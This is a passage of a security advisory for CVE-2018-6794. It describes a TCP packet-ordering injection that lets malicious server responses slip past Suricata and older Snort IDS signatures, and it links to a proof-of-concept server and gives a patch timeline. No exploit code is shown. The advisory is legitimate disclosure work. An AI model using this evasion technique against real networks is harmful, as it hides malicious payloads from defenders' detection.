Client <- [FIN, ACK] [Seq=83 Ack= 1] <- Evil Server
Client -> [ACK] [Seq=1 Ack= 84] -> Evil Server
Client -> [PSH, ACK] [Seq=1 Ack= 84] -> Evil Server
IDS signature checks for tcp stream or http response body will be skipped in the case of data injection. This attack technique requires all three packets from a malicious server to be received by a client side together before it completes 3whs. Proof of concept server was written in C to reproduce this and it works reliably in local networks. Since some network devices may affect packets transmission exploitation is not so reliable for the internet scenario.
This attack possibly may impact other network monitoring or intrusion detection systems because is not limited to Suricata IDS: an old Snort IDS version 2.9.4 is also affected.
Successful exploitation leads to a complete TCP-Stream response or HTTP response signatures bypass and may be used to prevent malicious payloads from network detection.
PoС:
----
A Working PoC server is available here: https://github.com/kirillwow/ids_bypass
There is also a traffic capture of this data injection technique.
Timeline Summary:
-----------------
2018-01-25: Issue submitted to the bug tracker.
2018-01-30: Patch ready.
2018-02-14: Suricata 4.0.4 containing the fix has been released.
References:
-----------
CVE-2018-6794
https://redmine.openinfosecfoundation.org/issues/2427
Contacts:
---------
Twitter: https://twitter.com/AttackDetection
Twitter: https://twitter.com/kirill_wow
Telegram: https://t.me/kirill_wow
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44247.zip